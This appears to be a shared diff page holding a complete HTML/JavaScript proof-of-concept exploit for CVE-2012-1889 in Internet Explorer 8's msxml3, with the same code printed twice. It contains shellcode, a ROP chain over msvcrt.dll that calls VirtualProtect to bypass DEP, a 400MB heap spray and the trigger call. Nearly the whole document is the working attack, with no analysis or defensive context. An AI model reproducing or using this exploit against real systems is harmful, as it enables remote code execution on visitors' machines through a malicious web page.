evi1m0 · April 27, 2017 07:56
diff --git a/CVE-2012-1889 Stable PoC b/CVE-2012-1889 Stable PoC
 <html>
 <head>
    <title>IE8 CVE-2012-1889 BypassDEP Stable PoC</title>
 </head>
 <body>
 <!--
    Tested: WinXP 5.1.2600 Service Pack 3 Build 2600 IE8
    Create: 2017-04-25, evi1m0.bat[at]gmail.com
    msxml3!_dispatchImpl::InvokeHelper+0x9c:
    037dd75a ff7528          push    dword ptr [ebp+28h]
    037dd75d 8b08            mov     ecx,dword ptr [eax]
    037dd75f ff7524          push    dword ptr [ebp+24h]
    037dd762 ff7520          push    dword ptr [ebp+20h]
    037dd765 57              push    edi
    037dd766 6a03            push    3
    037dd768 ff7514          push    dword ptr [ebp+14h]
    037dd76b 68f8a77d03      push    offset msxml3!GUID_NULL (037da7f8)
    037dd770 53              push    ebx
    037dd771 50              push    eax
    037dd772 ff5118          call    dword ptr [ecx+18h] // <<<
    037dd775 89450c          mov     dword ptr [ebp+0Ch],eax
    037dd778 8b06            mov     eax,dword ptr [esi]
    037dd77a 56              push    esi
    037dd77b ff5008          call    dword ptr [eax+8]   // <<<
    037dd77e eb79            jmp     msxml3!_dispatchImpl::InvokeHelper+0x13b (037dd7f9)
 -->
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>
    <script>
        var shellcode = unescape("%u16eb%u315b%u50c0%ubb53%u23ad"+
                        "%u7c86%ud3ff%uc031%ubb50%ucafa%u7c81%ud"+
                        "3ff%ue5e8%uffff%u63ff%u6c61%u2e63%u7865"+
                        "%u0065");
        var rop_chain = unescape(
            // Rop Stackpivot
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
            "%u5ED5%u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            // Mana VirtualProtect
            "%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
            "%ubc13%u77be" + // 0x77bebc13 # skip 4 bytes [msvcrt.dll]
            "%u5515%u77c0" + // 0x77c05515 # POP EBX # RETN [msvcrt.dll]
            "%u0201%u0000" + // 0x00000201 # 0x00000201-> ebx
            "%u0cb3%u77c2" + // 0x77c20cb3 # POP EDX # RETN [msvcrt.dll]
            "%u0040%u0000" + // 0x00000040 # 0x00000040-> edx
            "%u09ea%u77c1" + // 0x77c109ea # POP ECX # RETN [msvcrt.dll]
            "%ufa05%u77c2" + // 0x77c2fa05 # &Writable location [msvcrt.dll]
            "%u7a41%u77c1" + // 0x77c17a41 # POP EDI # RETN [msvcrt.dll]
            "%u6101%u77c1" + // 0x77c16101 # RETN (ROP NOP) [msvcrt.dll]
            "%u9dd4%u77c0" + // 0x77c09dd4 # POP ESI # RETN [msvcrt.dll]
            "%uaacc%u77bf" + // 0x77bfaacc # JMP [EAX] [msvcrt.dll]
            "%u1d16%u77bf" + // 0x77bf1d16 # POP EAX # RETN [msvcrt.dll]
            "%u1131%u77be" + // 0x77be1120 # 0x20-0xEF&VirtualProtect() [IAT msvcrt.dll]
            "%u67f0%u77c2" + // 0x77c267f0 # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
            "%u1025%u77c2" + // 0x77c21025 # ptr to 'push esp # ret ' [msvcrt.dll]
            "");

        // HeapSpray 400MB
        var fill = "\u0c0c\u0c0c";
        while (fill.length < 0x1000) fill += fill;
        padding  = fill.substring(0, 0x5F6);
        evilcode = padding + rop_chain + shellcode;
        evilcode += fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
        while (evilcode.length < 0x100000) evilcode += evilcode;
        var block = evilcode.substring(2, 0x100000 - 0x21);
        var slide = new Array();
        for (var i = 0; i < 400; i++){
            slide[i] = block.substring(0, block.length);
        }

        alert("Allocated!");

        // 0c0c0c08
        var obj = document.getElementById('poc').object;
        var src = unescape("%u0c08%u0c0c");
        while (src.length < 0x1002) src += src;
        src = "\\\\xxx" + src;
        src = src.substr(0, 0x1000 - 10);
        var pic = document.createElement("img");
        pic.src = src;
        pic.nameProp;
        obj.definition(0);
    </script>
 </body>
 </html>
	<html>
	<head>
	<title>IE8 CVE-2012-1889 BypassDEP Stable PoC</title>
	</head>
	<body>
	<!--
	Tested: WinXP 5.1.2600 Service Pack 3 Build 2600 IE8
	Create: 2017-04-25, evi1m0.bat[at]gmail.com
	msxml3!_dispatchImpl::InvokeHelper+0x9c:
	037dd75a ff7528 push dword ptr [ebp+28h]
	037dd75d 8b08 mov ecx,dword ptr [eax]
	037dd75f ff7524 push dword ptr [ebp+24h]
	037dd762 ff7520 push dword ptr [ebp+20h]
	037dd765 57 push edi
	037dd766 6a03 push 3
	037dd768 ff7514 push dword ptr [ebp+14h]
	037dd76b 68f8a77d03 push offset msxml3!GUID_NULL (037da7f8)
	037dd770 53 push ebx
	037dd771 50 push eax
	037dd772 ff5118 call dword ptr [ecx+18h] // <<<
	037dd775 89450c mov dword ptr [ebp+0Ch],eax
	037dd778 8b06 mov eax,dword ptr [esi]
	037dd77a 56 push esi
	037dd77b ff5008 call dword ptr [eax+8] // <<<
	037dd77e eb79 jmp msxml3!_dispatchImpl::InvokeHelper+0x13b (037dd7f9)
	-->
	<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>
	<script>
	var shellcode = unescape("%u16eb%u315b%u50c0%ubb53%u23ad"+
	"%u7c86%ud3ff%uc031%ubb50%ucafa%u7c81%ud"+
	"3ff%ue5e8%uffff%u63ff%u6c61%u2e63%u7865"+
	"%u0065");
	var rop_chain = unescape(
	// Rop Stackpivot
	"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
	"%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
	"%u5ED5%u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]
	"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
	"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
	"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
	"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
	"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
	// Mana VirtualProtect
	"%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
	"%ubc13%u77be" + // 0x77bebc13 # skip 4 bytes [msvcrt.dll]
	"%u5515%u77c0" + // 0x77c05515 # POP EBX # RETN [msvcrt.dll]
	"%u0201%u0000" + // 0x00000201 # 0x00000201-> ebx
	"%u0cb3%u77c2" + // 0x77c20cb3 # POP EDX # RETN [msvcrt.dll]
	"%u0040%u0000" + // 0x00000040 # 0x00000040-> edx
	"%u09ea%u77c1" + // 0x77c109ea # POP ECX # RETN [msvcrt.dll]
	"%ufa05%u77c2" + // 0x77c2fa05 # &Writable location [msvcrt.dll]
	"%u7a41%u77c1" + // 0x77c17a41 # POP EDI # RETN [msvcrt.dll]
	"%u6101%u77c1" + // 0x77c16101 # RETN (ROP NOP) [msvcrt.dll]
	"%u9dd4%u77c0" + // 0x77c09dd4 # POP ESI # RETN [msvcrt.dll]
	"%uaacc%u77bf" + // 0x77bfaacc # JMP [EAX] [msvcrt.dll]
	"%u1d16%u77bf" + // 0x77bf1d16 # POP EAX # RETN [msvcrt.dll]
	"%u1131%u77be" + // 0x77be1120 # 0x20-0xEF&VirtualProtect() [IAT msvcrt.dll]
	"%u67f0%u77c2" + // 0x77c267f0 # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
	"%u1025%u77c2" + // 0x77c21025 # ptr to 'push esp # ret ' [msvcrt.dll]
	"");

	// HeapSpray 400MB
	var fill = "\u0c0c\u0c0c";
	while (fill.length < 0x1000) fill += fill;
	padding = fill.substring(0, 0x5F6);
	evilcode = padding + rop_chain + shellcode;
	evilcode += fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
	while (evilcode.length < 0x100000) evilcode += evilcode;
	var block = evilcode.substring(2, 0x100000 - 0x21);
	var slide = new Array();
	for (var i = 0; i < 400; i++){
	slide[i] = block.substring(0, block.length);
	}

	alert("Allocated!");

	// 0c0c0c08
	var obj = document.getElementById('poc').object;
	var src = unescape("%u0c08%u0c0c");
	while (src.length < 0x1002) src += src;
	src = "\\\\xxx" + src;
	src = src.substr(0, 0x1000 - 10);
	var pic = document.createElement("img");
	pic.src = src;
	pic.nameProp;
	obj.definition(0);
	</script>
	</body>
	</html>